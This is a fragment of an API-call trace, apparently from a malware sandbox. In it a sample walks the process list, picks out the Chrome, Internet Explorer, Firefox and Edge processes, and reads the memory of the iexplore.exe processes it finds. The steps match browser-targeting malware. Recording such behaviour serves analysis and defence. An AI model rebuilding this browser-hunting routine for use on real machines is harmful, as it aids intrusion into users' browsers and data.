	[0244.380] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0244.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.381] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.382] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0244.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.382] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.383] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0244.383] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x8f34
	[0244.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.383] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0244.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.384] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.384] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0244.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.384] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.385] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0244.385] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x8f38
	[0244.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.386] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0244.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.386] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.386] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0244.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.387] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.387] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0244.387] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x8f3c
	[0244.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.388] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0244.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.388] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.388] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0244.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.389] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.389] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0244.390] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x8f40
	[0244.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.390] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0244.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.393] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.393] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0244.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.394] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.394] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0244.395] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x8f44
	[0244.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.395] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0244.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.395] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.396] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0244.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.396] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.396] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0244.397] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x8f48
	[0244.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.397] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0244.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.397] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.398] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0244.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.398] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.399] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0244.400] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x8f4c
	[0244.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.400] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0244.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.400] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.401] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0244.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.402] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.402] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0244.403] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x8f50
	[0244.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.403] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0244.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.403] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.403] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0244.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.404] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.404] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0244.404] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x8f54
	[0244.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.405] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0244.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.405] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.405] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0244.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.405] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.408] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0244.409] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x8f58
	[0244.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.409] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0244.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.409] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.410] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0244.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.411] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.411] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0244.412] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x8f5c
	[0244.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.412] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0244.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.412] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.413] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0244.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.414] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.414] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0244.415] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x8f60
	[0244.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.415] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0244.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.415] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.416] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0244.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.416] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.417] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0244.417] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x8f64
	[0244.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.417] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0244.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.418] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.419] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0244.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.419] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.420] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0244.421] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x8f68
	[0244.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.421] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0244.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.422] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.422] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0244.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.423] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.423] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0244.424] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x8f6c
	[0244.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.424] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0244.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.424] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0244.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.425] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0244.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.425] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.425] NtQueryInformationProcess (in: ProcessHandle=0x8f6c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0244.425] ReadProcessMemory (in: hProcess=0x8f6c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0244.425] ReadProcessMemory (in: hProcess=0x8f6c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0244.426] ReadProcessMemory (in: hProcess=0x8f6c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0244.426] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0244.426] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0244.427] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x8f70
	[0244.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.427] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0244.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.427] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0244.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.427] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0244.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.428] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.428] NtQueryInformationProcess (in: ProcessHandle=0x8f70, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0244.428] ReadProcessMemory (in: hProcess=0x8f70, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0244.428] ReadProcessMemory (in: hProcess=0x8f70, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0244.428] ReadProcessMemory (in: hProcess=0x8f70, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0244.428] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0244.428] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0244.429] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x8f74
	[0244.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.429] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0244.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.430] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.430] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0244.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.430] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.431] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0244.431] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x8f78
	[0244.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.431] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0244.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.432] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.432] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0244.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.432] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.433] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.433] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x8f7c
	[0244.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.434] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.434] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.434] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.435] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.435] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.436] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.436] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x8f80
	[0244.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.436] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.438] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.438] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.438] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.438] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.439] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x8f84
	[0244.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.439] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.440] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.440] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.440] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.441] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0244.442] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x8f88
	[0244.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.442] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0244.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.442] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.443] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
